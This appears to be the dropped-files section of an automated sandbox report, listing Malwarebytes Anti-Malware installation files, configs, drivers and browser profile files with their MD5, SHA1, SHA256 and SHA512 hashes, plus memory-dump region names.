SHA512 f21ce07420661f750a65790fe16353614d42a203ca2581887cfa1fba55336cfaf662599ec94b1a81d5971900e59216a2c59de7541f1085958e40c0f61320d693

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\rdefs.mbdb

MD5 2f7423ca7c6a0f1339980f3c8c7de9f8
SHA1 102c77faa28885354cfe6725d987bc23bc7108ba
SHA256 850a4ea37a0fd6f68bf95422d502b2d1257264eb90cc38c0a3b1b95aa375be55
SHA512 e922ac8a7a2cde6d387f8698207cf5efbd45b646986a090e3549d97a7d552dd74179bd7ac20b7d246ca49d340c4c168982c65b4749df760857810b2358e7eb69

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\prot.mbdb

MD5 546d9e30eadad8b22f5b3ffa875144bf
SHA1 3b323ffef009bfe0662c2bd30bb06af6dfc68e4d
SHA256 6089fbf0c0c1413f62e91dc9497bedc6d8a271e9dc761e20adc0dccf6f4a0c1f
SHA512 3478f5dcf7af549dd6fe48ad714604200de84a90120b16a32233b6d44fa7240f5f4e5fe803f54b86bbdfd10fa1bfdd88fb85eb6a78e23e426933f98d0a2565ec

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\scan.mbdb

MD5 da36147a72d8a1c37789320a92bf0051
SHA1 55fd106c31eb233ed6335ed4fe0c0f9690d58c6c
SHA256 89d315861ebe01071317212466c63fb74385d740a6034443d1bbdae090b09428
SHA512 b72b8c50289d91a7ee194474886efd3aa2b1ac665246c30a2a4db83566bb955a210467b3cbb193945ea55a91ab5465a0d098a4bd415da2eb12267a7936081b58

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\tids.mbdb

MD5 cd36d4f99b48adf42f78c0f3b98524ea
SHA1 427509df675f45166210a7f254e05e5abd313eb2
SHA256 84c5ac471c5b00a8ee775585ef833bde5e194a2ed5ead4c118b5b209aab2d2ff
SHA512 fa93bc3230106cb4dd3192efce4df69d035a280e01c4f79da776429425c43a2bfdf16eec766d7a740b1e5d6dc3a9e68e4ca71638d29dbfb0b9ddb6f8a286b1a1

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\clean.mbdb

MD5 8f54705e090776ed5132a3c0ff52b844
SHA1 1ab5ebd87579801626b57b31a0b5d2afd945468a
SHA256 50058edfd571d2b2714f9f34a715cae511b2fc0b11fdb54ef7576235e9a3b0e6
SHA512 e00edc8e0b890b79498863659f0727281a57fbf3223e2ba987939d5d7924644ea483a26b8a245a75f038977da514504afa241c804b66e8b7e30e9e43f8895d34

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\wprot2.mbdb

MD5 1c9f8498e0a0cd20f55af4faeb8fa01a
SHA1 9398c88fa401388dc8f22def161a648454877fc3
SHA256 d1b236bb758d5c8e5cee9500258420c42ba2f9935ed0f0d72765857fafbe7970
SHA512 535243d9ac4f6cd7043c416a25a0cbf1b1696d0c305622aa1056c6efde8f510e52b8022fc58a9a59c9cd380df2d8a4aa1568bc821d26b133cc267cc53c43783e

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.sr

MD5 c264c2c9c754507f2d1039a9019a37ad
SHA1 189008930df72aeb4ed02e164cfc4cfbfad05004
SHA256 d78b371d4f6c0e5a5791a80159949b572dd85980e9bd2bfc98c7d0854ccf781f
SHA512 d0808847a3e7f0f7115f6225a6e88025bace41082cd742c09a07133ec100d10a5fc4cfcc91a2dbfac4ebfcf82aa65c8f7b6371dbf6e742e76d42daf5b96bb0fb

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Actions.dll

MD5 20d70c6e04dbf14c01ab2d756e97854f
SHA1 f172c8b8c0e87d2a9ab064513dce004d16d03e0d
SHA256 c4002339b58bc493ae3540bafe1b2ca0a70bba0f853e29f60e0f6a1680fa9a24
SHA512 13e073cd4b3d53c6d9fdda671a55962266b5c0a18abcb5774092c35f0d0bf2c5d0d9802d8955d32cceb166821634bfc067dac7809c9ade143cf3a3b497743b36

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dynconfig.dat

MD5 10f23e7c8c791b91c86cd966d67b7bc7
SHA1 3f596093b2bc33f7a2554818f8e41adbbd101961
SHA256 008254ca1f4d6415da89d01a4292911de6135b42833156720a841a22685765dc
SHA512 2d1b21371ada038323be412945994d030ee8a9007db072484724616c8597c6998a560bc28886ebf89e2c8919fb70d76c98338d88832351823027491c98d48118

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\exclusions.txt

MD5 aef4eca7ee01bb1a146751c4d0510d2d
SHA1 5cf2273da41147126e5e1eabd3182f19304eea25
SHA256 9e87e4c9da3337c63b7f0e6ed0eb71696121c74e18a5da577215e18097715e2f
SHA512 d31d21e37b0048050b19600f8904354cff3f3ec8291c5a7a54267e14af9fb88dfb6d11e74a037cc0369ade8a8fb9b753861f3b3fb2219563e8ec359f66c042db

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\mbdigsig2.dat

MD5 9ca4d1f0c376ef7d268c4f39ebe22a39
SHA1 81ac2891e6cb1ac8e120d93e6b1637516d9002c5
SHA256 16653be0cf560b622acd48ba07c1984545fc795262d9f71e56af92cbbd61cd69
SHA512 bf4362472821af45a5476fc3d35fa3941a04d1214deacee50e6b84506e8fcea19e3e3df765bfa10ed2b78dd0a00e89a7655fce386365ca52e8e90959f5c4c329

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\dbmanifest2.dat

MD5 89324b2da363536bfb9206ba274f67d5
SHA1 80775bee16ae4255b48c3028633fc084b3db8c5b
SHA256 d4b4bd3226f7d549193f1264ad791e18d908ebe1238b5ab2a73f268a3b31f995
SHA512 547244d85a13424088f3ecbcc6205435e44122f91747929f24d09233c12382d5f7ea1b3979106ce8912c17d34e52ec72aa86a2a6db7ee8792c24aef02e84a8c6

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\cfg.bin

MD5 9e955265e30b5c0ce0cf667b6faa1b9e
SHA1 9663452dc45620af1469c5a773346a03ce91ebc5
SHA256 82ce153386ccf9c8f52cf5bc1ed1bf175538ff1e367c52458f2245c387573844
SHA512 35a75e83ebf7934a65d8241249e0816ee7a07b21bd671ae1327a2fe2aa09dbbb3cb478194a3390976bf3b29d5bb3a7b1a22626549ccfe8836ea78953591c1367

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\Global.nm

MD5 f4444abfcce5142cd61d8433a405a23f
SHA1 195a36ad18faeeb1c5195918f42a430864ce4cbd
SHA256 e8c0f722370e2f838a5333dc7ddfe16113c4312cbabeaa8d240978da599a69dd
SHA512 a39d5ad31c72bd7e41f88df06d4402ad492d90d1ea4e7612f0d25a57b7c75271d40d0ee5c75a37c872899cfb0886b5f7f034ed989dbf59cb142ee2e52853819b

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\sample.dll

MD5 746df014f6869285e5545505d5fec062
SHA1 52d5f0232b78c0d8746a29e75f80a2b436f38b69
SHA256 22047c6efd6906c64ebb45bf08632220aa82c03d1fe21b79502b0cb7b67b32c2
SHA512 58e7a0051cff72168ec56072339b2a4961a9bc12600a6fe4dd3c01f0aa8b7d22e3d79d72c7ee9a622508e4052eb7c82d047063659c23b34bf93eff7124619848

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\ig.exe

MD5 bbb352dbbf17f6fc29cd86bc1d80a417
SHA1 1c83c920ae75d0f6e8634804e508e9156f565148
SHA256 73df768292a90e52fcbc5dedc51f8091083fb6042f4413d69afeace1cb0ba509
SHA512 12242406306d9808afb3c9d9d590867f4d116a765d0ec761436b4e272ce456b0b72a5687856d1b6672980faf4246721d297b0520821d5fcb81d7eaa86775ee5f

C:\ProgramData\Malwarebytes\MBAMService\lkg_db\BrowserSDKDLL.dll

MD5 a3fe79081a59d493c01b5c1139babdc9
SHA1 1505cb4053bcd9b55c40227ad6b62a2457cebbdf
SHA256 60c8c024ff020f04fcccec10ee78872bb1e6985463d6370c6af095761d88b860
SHA512 22310a585edb36050ff20356cd9eb5129cdae3ffea2ccd7a54d9652dbd336d7f402ed119dc59ae3250b93bad40e75983184256c0bb239cff049bbb983f487bdc

C:\ProgramData\Malwarebytes\MBAMService\config\CloudConfig.json

MD5 3e150e49df1d1287a3aeda09344b8dc7
SHA1 73445db8b83127343a03be50cd893fce16fd547b
SHA256 0c9c1a4c8deb31c09dbfbfdab1769654f0ed3d348b4a76f667ea0bb6805aa5ff
SHA512 54311ad59ef9695529d8f1345f00eb9d0d73ef0218f0bedaef16fdb4a8e3477b13434571ad3d7539456aea3727e50e601915348c2e7238853d7c134abd369553

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 643d522fdc0b6805b36d65d67520f105
SHA1 9246ef5f574fe3c81a0828466833837cde1d01f0
SHA256 8ee64f89c48110b3aaebc0a7888affe99c47c9a73d9809096f18d3610c6cf735
SHA512 27c8b7044f4ad968bf474bda7f7a463fe000356afac58900c3caa4821cbcc0bdd0007689ee894bee19b2005f2d787230ea1bd9e104eb4b59c5c16f1945ab70c3

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 98818ad302268e85323488150a944a3d
SHA1 72ab088d8a0090cd26a87c5023bb59b49f9bbc5c
SHA256 0b58bebc2d3011f4cbeda716a32b4854ac01ed12ca20367471304d6c6af99f4d
SHA512 bb39ae3ba83470f9b9eb44a94dc978b1f6711407dc2aa6aab0a18690c22b1fa4f24c11a67fad59df5e9c82cbf24acd9a71372f59d788e31d675b6b8ebe9dd146

C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json

MD5 fd513541f65da34aa3ca70c3c509c2dc
SHA1 960b181003b508137f74ae7059abefe4d40e0b82
SHA256 9c77ce6e30e7fa396506d8191340a60862edd7f02e9716f8db01fd48af8e037b
SHA512 a4c278e7c26fc8ce3d6d24272407c09b5a97c3782ee6feeface9d33927526e40c817fa2999f9b39f67b2127f6448ec03e8862014549f8258b2c0ca19e6dc0131

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 da969e4d05446367e33a232ce0f89727
SHA1 7ceef168401276347429474a7a7cd0a77b17f9ca
SHA256 766d7fea3f88abfe82feec3c36eb6725def811dc38945897b3ac0fefe6c045ab
SHA512 9e97f7ee2f745afb916b24b6d3e5d942176479a801c7997beac14e010bdb526f3c6fa250f9bca63dae2080b598cd494b54c13a041e86149775e1e2ea7cac09a4

C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.sys

MD5 4b2cc2d3ebf42659ea5e6e63584e1b76
SHA1 0042da8151f2e10a31ecceb60795eb428316e820
SHA256 3db4366ccb9d94062388000926c060e2524c7d3ee4b6b7c7cf06f909f747fc6c
SHA512 804d64d346b3dbb1ce3095a5d0fa7acc5da0bf832c458e557dac486559fe53144f15f08c444fea84a01471fd5981e68801a809b143c56b5b63e3e16de9db0d98

C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.inf

MD5 d87c2f68057611e687bdb8cc6ebea5b8
SHA1 27b1311d3b199e4c22772fa1b7ea556805775d37
SHA256 ff93773f55bf4a6a0242adf82276a8c95c0b244b9bc05e515c4e810c81a960e8
SHA512 4aa65b8911d8a2a0f9ef0ee6e934b94db0a9ad4c2ec543b5edcf21486be43f6ab1fda6617ea2cbb85eff230628c9fa8e7649da915d6de695803b28e55bef5819

C:\Program Files\Malwarebytes\Anti-Malware\sdk\MBAMSwissArmy.cat

MD5 f7c8e0339bd48b6fe8eca81ac3ba5ba5
SHA1 1369bd4dcfa7709d8eed12fa76fdbebd39dd6bcc
SHA256 a9dd01f84a075ea8d0b0968fd7a11720e49f019834f7d4fe80f50dacb12030aa
SHA512 c722510c40fbed32bcda3b5b69c590a9043e4e51f8e804f77f73eb8ea0cac0f4a587ef540f2773981839f04e44f48bbc8b5e8c03ded3f0cf637ed1e3172c8e07

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 057901586f52683f340559f3977dddf1
SHA1 97884e4b2b3f138e42124b42bfec87c01634bef9
SHA256 7c325b30c2a41e1f0c541a308b31c908033a25323effb70f2be62db77dbf89d6
SHA512 12dc28d5d2cb88679afc13167ac510b26e1f96e884bc9b541b1d4d090c92c6be9f8f20fa3d7d85afcb3f282734b02d210a636a134cabf6acea941d96ad90c23d

C:\Windows\System32\catroot2\dberr.txt

MD5 eaddcf96c810ea226a32b7fb36bb6fb4
SHA1 455ff3ce11ad0bd33e6355082318a47cd1fe4491
SHA256 00180c7bbe7353420dab34cfe8505caab038cd21f8a7f9ce466922d82594224d
SHA512 2121a0d09e5f45f8ebf66c0f64153810a6e950c268dd51055b94cd7ffa5a5529ed1119cbb3120d69ef22925d224d7ffc0c53750c67608098b09fb04882ef614e

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json.bak

MD5 fcf61612b808a58037997316cc065338
SHA1 e4caa5d9e894c726adb9f55c6578b3d176a7e3b4
SHA256 3f34ccf30f3e0b5c7d2c4748dbe297bdcd526ed553589eb5f7ed25c1a471dd92
SHA512 24617443e84b8ceb77a1e1325ef83f2fa1f5076aa968acdb20589c9ca27fedbdf139bff2fc898124aafbfbb03c74780ea42f3a85c5bba696f0dddb29c19a3b0d

C:\ProgramData\Malwarebytes\MBAMService\config\RtpConfig.json

MD5 7abedd6f23bde8a73ad019cdc9cb9f6e
SHA1 236b8dd7ba040b0e0e72426fcee34f796d02b3a8
SHA256 a1242fd8efa0ac312bf4551a4accf32c0b777ca71ca99ec70067bd16e2d4711a
SHA512 ab02bb89dd5dfa2a1015a1b4bfb2bb6a94855abb85207700fb98378ff4f091e1271b669305c325275604d1332bc3ccc96550ff0e42812250ce4b67febcd4e556

C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json

MD5 f2bb357f0a2f85cb08913d92b548f384
SHA1 673c29e7ea9597b2e209ca0c47468ba36f2688a3
SHA256 45133f91f7a5eab0aef2b44ac0ff4077b2877abba13a58fe6a99352d788135e1
SHA512 a965c22442dd4e64f9b596f66a3742d69fd23735721216ebed5c04f18ac0dd7b3a7744bc41ac494f4db64dac96e8789aef60e5d9d23763327b0b16f171558e6a

C:\ProgramData\Malwarebytes\MBAMService\config\MwacControllerConfig.json

MD5 5520a658279871c037085fde659fdd58
SHA1 7d4d88aa15a9c3d8f05feac355b9cd57d19eee3b
SHA256 bbcac26c07e225254b5a3687afa477f4311d638a83ea1fa10206923c2a7141f2
SHA512 c8d2e703abed6d8eb29a44766f678d3ef9fdf232d7d0483840b8414b19a388aca8a5735f2b62cdc447016ed4e706d59df5572f18784689356455773e9afe51af

C:\ProgramData\Malwarebytes\MBAMService\config\ArwControllerConfig.json

MD5 4832ef961de98d57d5d814604c51e727
SHA1 fe7e2a2a555dfc7d139d4a33ca73dbe7a6b81bee
SHA256 21d5eb62dc430931106dcd0ee7caa71895f3c58ebe517a38cd6fd296764146cf
SHA512 25da82fb5aa0b7a567a6c6f0b21d2b6b5567198ac29c09549dea6d9a769ce2eb541aa4f2d78268fea8b0bb2c926a3f5f9f92a8125c1c6b0ebbfcb4eb17167097

C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json

MD5 8388cf3a27942cb0cb10a381b30b942b
SHA1 5a6b88780086c82809100cdfa034cd946e808703
SHA256 3d5557f33c4ceeca73b920a2bc5f8b07a1d49834a363ebdaa06b39896dc501c6
SHA512 5830bb0ad2602e939807007bfa588348853e3452ca5ad23a09fe3e6ad43efbf69a21ce865e2c219679f9184565c8c21fba5cbe948ee1f587499ee8ccdffaa9e5

C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json

MD5 d3069befddb7de5d91333affc0eb813c
SHA1 8a3f4c7fd00bf36159c22574f147e813c149cc8f
SHA256 5141836a5b5a77d326b474a9c2e8ca2f050c7151ac8df9d62f68408dd0fd7a64
SHA512 4d17078768f095840029d1d9e05ecac530606e1c2ccc4889234b6f3da19551634580432b6cb307324c78e17782a8d1ff39ec6be661cc0260230a6d15f0160984

C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json

MD5 67b6136cde50086a04d24421f905c7c0
SHA1 725bde30fd42a263b6f29e2974807243af7ea900
SHA256 3661c9fce9b75c15ac73b8863810da1169aa692465a1d214176eae4594ac3631
SHA512 db0cb7f3ecec7e01f21be7357fc72732f5404a69b0c374602188a7fee4b9f1b0631bd2ff96d61b703dd36807491b61ba3b57f4957b80b4db62ca4e17fc5dc5d7

C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json

MD5 a3e07b3c62826b7fb6cdf62a37220db6
SHA1 180fdb6d1ce6da6f872445beeba8c7959016bbc1
SHA256 52488ef7a49a0430cef8bb7c42f249fef75ac333f4f888b1ec17907cbf29d52a
SHA512 182041d71f3935096bac61023c44d9f570bde6dc1d6f45f63467788874e1f589a79c5f1f709594af93c92eb5cc80af2afd4e2b46397481e290e6966f3bfd01b0

C:\ProgramData\Malwarebytes\MBAMService\config\SpConfigFile.json

MD5 daae378616bacaa8c1855957c08a87ea
SHA1 7d30bbb4f58be184545fcacc7214974a7df0a5f0
SHA256 3585d7786045afb99043057a8d6279ee4718076c1598d117232d345364a2adf4
SHA512 5cab7edeae8a24672e72a291d0add8cd74e3f19289240ba51a0ee9fd91b64c1ac5413806c5d788e1390fcf6d0003949aeb7cc3fd4278a938a1b7ca43dd5f51e7

C:\ProgramData\Malwarebytes\MBAMService\config\VPNControllerConfig.json

MD5 eb7cf93c507d6f68236d84eeb9c46953
SHA1 dbb060748a4b634abef5cde1af0afffe072e8ce6
SHA256 bd09c4828d3d8c481d76aa339f872b1ed4d5c1791d568d1fac56bea5735a4a2e
SHA512 ce134457ed044ca6593d3568fc31d0139707e18df41a28d63118e555a941155dccfa91060d07a11fa38755820a0fd490835da12e5ddf49608d66c6d4c1068160

C:\ProgramData\Malwarebytes\MBAMService\config\VPNServerListConfig.json

MD5 bfd69999934883b90472b2351f22ba1d
SHA1 a98957b56eaf486c5be872b6388701741fbde0b2
SHA256 ac9a791979014e1e3f3691a9e20d22bcfe176b03ef83b97ac6ece22ae3a8a95b
SHA512 0c0df46b881848da1b50af16c6e69cc7131d02977d6bd6e66b50beab1a064975a19dccef8c8cd14669071e48eba3e2e80908810fa034545869bf2053a9168d45

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 f58fb08e8d0ba0c66f8f0057d319fb9f
SHA1 bce8d6f90de94695eb177a30e64609c8d3331475
SHA256 810bafda2c32e4225232ec554a7a8befe2d6c11c8c5306228f63f4a513e3d7cf
SHA512 7b3bc040101c9850455489f23394746da06631ee3a98679f706c7c59717e040de6411f8bbe5ed302aa226482188cdeff330d059881e65d1777485535412902c3

C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json

MD5 b4578d2d1f4cf227aa8df76fdb670b13
SHA1 ba391ff1ac391076dce56771ad9327353a5bc47c
SHA256 ecaa4548c688372ff94e81a3e127600bab1c3324804cc1b1f23f19d82614956e
SHA512 3f981ba4d45adccc44f97de25d5baa548ff5a1ec552a0df519d77490e2762bcb288f88ab03b0d0df8d67af72513cd2c22994ae1af6e200a3db7884491f72ff78

C:\ProgramData\Malwarebytes\MBAMService\config\PoliciesConfig.json

MD5 937c010f963bfb4baf574d92744c54d2
SHA1 8a7ae22e8d4b9f75f682e6467a0f908e5a4ee1ee
SHA256 3301644e7cca4ca88ef5135d608e68d6228688e70ab18faa7d9b0d2384c491ff
SHA512 8328801a56e7334522c88799e12cc41b2382c67ac7189ef122135445904fd9e538fad636449730876d2653c2002f8c6ef64869b5dd472f93dd3438243f415fc6

C:\ProgramData\Malwarebytes\MBAMService\config\VPNControllerConfig.json

MD5 ebf74016e7633484fc7e2db62ec3e1de
SHA1 161daf6f6696acffbd4183b213f5c0e51947249d
SHA256 2e1182c14194902f59b46cb4151174ec5f431d67aa1b0ab1bc9f3b776607da6c
SHA512 695c3da68d3879afef31c9b86d7e1584980fb513740ea247f373330005d59cda38fb2d3f149ae8c40a183b1b0d22d0c0177f50ba7874d920ef9943529ad3f5dd

C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json

MD5 7883277ea01b8dff7a65698bd3cc3d64
SHA1 6035588f7d3fb40be941c45e714dc5750f4061f7
SHA256 f615b13be9622b685b57f975f7454d428635e625ca2cf88fb0f613e03573f894
SHA512 6e1864703ac1e6f291726fef4b01542552f19a37d21f5b7341b1e9fb9ff59d7fb6ad783111db6f1f1c509a51df77133f5a434d50ceead46819073f67a44c0cc5

C:\ProgramData\Malwarebytes\MBAMService\config\UpdateControllerConfig.json

MD5 73d0852eef3c5bd4a73d857e8dd88bf6
SHA1 07ccb7b33fbbbab10a55f118b0fda343daccf2b7
SHA256 1ae9235edb3b8d229c2cfc15accd7d36185f95db97214b1a9259999396e23ec0
SHA512 48186dc83147dc5003e4d309efa6e8b26fe68e71c1b9b3d3c717f8dce50817f95631dc373a39ddac8fae2403ad698c357cc84aa7f1ad2330bd4b07657db1e6e2

C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json

MD5 255ac6ba1ba5c170f9cb431474f80e1e
SHA1 f4ad2222fb0a1e5f473bf53ac633a83b41f4133d
SHA256 c6e1e486a2d90e44f49751824473dae4f4cbbcc079daa6683b0571a68dff9e48
SHA512 2c6180c5f77db589a8944eaf775dd51a891404767360966628e09fc3bbc9c94fa0d6f592c0fb32b38cc1610c176a9d13623c90e3916da4261b43e3ae796aeb7a

C:\Program Files\Malwarebytes\Anti-Malware\mb5uns.exe

MD5 eaac9032a5151ea0d7b74ae4bab32b35
SHA1 f2c1f886868f6b9f78aeda8cf95df5051239c1ef
SHA256 807379fdd7315c29bc1e96ed224285ac5ae0226bdfa5318642eaed6bb0ca3191
SHA512 91fc6c387ee270372c401aa27aa399c5f6091dbcf1e94058c88e5edb473a7876c9de632cff5a4d6479a2a9bdcfb499c8ac6cdd3bd954b04db89685ccde0661db

memory/1708-5959-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

memory/800-5961-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp

C:\ProgramData\Malwarebytes\MBAMService\config\CleanControllerConfig.json

MD5 70d9d1c7201e145419598a1983b5428d
SHA1 034698a9057d33e155d680eaa07a5891cfd09e1f
SHA256 3ee3e3934708902161f1b174e4da39f67b4ae5ed528ed529166ff2d2d3afb08c
SHA512 6207eb5cf218c38a32094cf204b2a14567fbc41dec225aa71d0ad567f590103524d2f62ef49d14f211813948f1ebe165476b7ac4557031106726474d8de22ddb

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 254f7da80b380f61604b94b42ec1fbc7
SHA1 b414e7bc6b05564c5c97b89658bb6a5d8dcb6656
SHA256 f849cfcda0297841baeee673436302138a63d76a5dd5e7ee33b2b31645848804
SHA512 d8369e634402c770c256cf02cdb22c73ffe478fe823db5d2eb9df755f5ea9be2a82a94d09865da557d490c13b8304bdf9e040a1537d78c2d28c7e5e222c05863

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 bd96d72eb6f66aedddaa56f09a4d350a
SHA1 ee1ce0d79b28855ab7808c6fa422433ac4317415
SHA256 43ace5a374f9b11980fe361400dc585374520cdb2241f570959952786101764e
SHA512 598e5963a202cb9bdeccf343eabd9172f559e44a3adf5efcdfe37988baa965f4c141eaa45c4c25952e65aa8e33a7398c1d647a4829508f3aa1e12072e3903254

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b5cf454386614855bdcd46577c16773c
SHA1 0b1a6559d70c352797aa3a954f5ab37f2e58e627
SHA256 0e3284710281fd0f5d473f6f2e08e37b3422955c86df68bf8e74813a07ea052a
SHA512 9f34c34b3123f7276dfa00f2739a4776bc21c18d70c8b2609b7aaa1049de58fbb870efc798d862360fde6d4175b03044b5574ba6252ec3d36a2eeed024e4124d

memory/1708-6107-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

memory/800-6111-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp

memory/3896-6115-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp

memory/5196-6116-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp

memory/3896-6117-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp

memory/5196-6120-0x00007FF8DA380000-0x00007FF8DA87E000-memory.dmp

C:\ProgramData\Malwarebytes\MBAMService\config\LicenseConfig.json.bak

MD5 9228a5cc0292261b155564141effedcc
SHA1 86c7182a317b96bcaaad42dd0e7eda692a39af73
SHA256 5d32eca478274446881cab62c05512e12cf45d42379c44231d434a626b7b13fb
SHA512 8b4aa0a85ce0846980d71ac8ac5de4fead0ad315ecfd3094a74339ad3b3d2af1cc6da998b7e065dec70dea3455ea45bb0a5cff7e80590ac35e0c70e397b99be0

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 8497cca85293564954a9049fae4a2ee0
SHA1 2332ce0133ed24f2cb8cb4fe876f50fde690c03d
SHA256 ecbfaa447c94ef30882b566925986d8c2c2eac5333f47a1da6e10b880cf1807b
SHA512 e1f37431158bc8c70da6ce2a42a9ec50d965b4523eadeddb46f23ca9a611edb2008c94f56d2d553201b5c22dad219df4f085308ab487f1e79f6ad631bb25ffce

C:\ProgramData\Malwarebytes\MBAMService\config\ScanConfig.json

MD5 8ca15860e4fc123b2d9196aac5a73a59
SHA1 97bbc5ddf642ce7ca4f0a2baf9f8411953338818
SHA256 c525a6af40068b1e021a41656a1dac73e939d8dae8eadbf63c686115163dc9e0
SHA512 1a7a8f22f26ad61a488b630b7b62fc65cbd0b0ba1c558e23425e5815bf63632a7fb5dd3c79f1a6998328179f725f64bc775ad4f57935d6a9c845ea31a858b98b

C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.inf

MD5 5a9717e1385703e8f06b27aa10a69e87
SHA1 84ee67a9167b5eb6560711b9871de98898ad07a5
SHA256 47b7c516bb57c612de19f0ca865590af95b6e32bf873a0fef9e011b2c5b483d4
SHA512 dd3c7278c2c11ad15a55fae6d19b96dadd92f85b7f0c8ce934298258af00bb5c052a84a98499b8867b0f43704fb307c67d03692ca69dda4d814c6c17dd73df44

C:\Program Files\Malwarebytes\Anti-Malware\sdk\mbamchameleon.sys

MD5 262ccb223392f18adb4b4c846905c4da
SHA1 63403407fbe1712a4bfad0a74efabeba297325ca
SHA256 5d2004603e3b392693a1e74926a36a2ab3573c6790b00ddb14564c8affbd4f4f
SHA512 68b2684b9f0a2e5e33b76e43ac4b25b8e7d3dc3d678fc3c90d70ec5ee65ebdd884d838950fb4bc5145ff927e25796d2e6e97ee6bf365ed4f66ac7f7ba8f63b33

C:\ProgramData\Malwarebytes\MBAMService\config\TelemCtrlConfig.json

MD5 f4993b17b457e6a2ae76a65090bc2458
SHA1 8de386dae6da6b000613715cf00bada61aed359d
SHA256 ee85545f24ccbb04e6ec498fbaff7a6afc705a050648cde20c05da4abb990a36
SHA512 81b8966a71ed707a89aa676a3588426d2a854cac55bd1dd8c81a070e1729e7efd5d0e6b27de58809a03c5809d47f3b955817565da69e666a8e1ae1f7458b1665

C:\ProgramData\Malwarebytes\MBAMService\config\SpConfigFile.json

MD5 b598b04018a6e5465e1cd08f91816ca0
SHA1 74e99cf6c83474a95680664cc98f6353bc0c7104
SHA256 b07ca85735af9f4fa951f86dd7f60203607587fb2dbb86db502c21c34e49e7e9
SHA512 8a85c2d5b6a1f9875132393d55bbde9e817a2ec336ec6954969798004eef84e4bd83083849eba52a814891bc0b448ae927ea73c083ebdc4bd675baeaa58604b8

C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.sys

MD5 d738a028dcfb7d1cf97e9fb11e306db7
SHA1 77f4d6a79e1f2754a2e93095158d0edfb9a6a5eb
SHA256 8f38d2a0a8e306de910bb621cab4276520aed84645de942538d0a9c792dd0074
SHA512 c753a13767c8460823851a144a2a9162168a1099664ba601d0a929d539ee15d78123ffd86cb6225f0d7e6f52f40b2c444705da8bcc1292bb6c9757732b82ad94

C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.inf

MD5 358bb9bf66f2e514310dc22e4e3a4dc5
SHA1 87bfc1398e6756273eee909a0dfb4ef18b38d17c
SHA256 ff51780a5a854b2c18f71ae426cb066a13723ef6155e24f4910137c9e8dfdc17
SHA512 301ec5ec5c0813951843011f2204924240235494999136ea30a557cbf58146fc6043a8866b344fa7deb927d7c83d44e2aaf45adca7d221aba5d36715b9a63e09

C:\ProgramData\Malwarebytes\MBAMService\config\AeConfig.json

MD5 0798225d19c4c9608a3f560081b42c9d
SHA1 a6ef8cd5be416c46b7db08294db95fc44bab5d21
SHA256 8f2932adc90edb6c848dcc4ac55153188a48e07960898e95d2da6207fd363c37
SHA512 97816c5d91799a688973c005528720d08266cf15051061667b2d7b94dc1ea2eaea9eab8856c94f497265ceeae5ebef262f5a8a11204609324397e4882edc9df8

C:\ProgramData\Malwarebytes\MBAMService\LOGS\mbae-default.log

MD5 26f35c9fd6452b6ac21cec576f4b9889
SHA1 d30a2903859353ee4bb80aa53e932d80e8d845c5
SHA256 e4c57f19c34d251882db288c7b52df2d8f0a7244c41c22a85870886f84989f69
SHA512 e6e54c4ca779386fe246cae2eb9c115ddede3687b5c51a13c64c3526fb2d9542ae3cf6779d84dfd03ef7ca285981fcbda2ae02fdb37a8088da852280f4935041

memory/1708-6341-0x000001FD3AE30000-0x000001FD3B32D000-memory.dmp

C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.cat

MD5 43af9deb38e2dbd69c46b6befdbddd6e
SHA1 eb7a9e4cdd74f0cc5a1ee07292a561123cab2545
SHA256 ca94b3a3b8721870a0b96675649800bd751daadc0391cbf3143e2f7aae6dc676
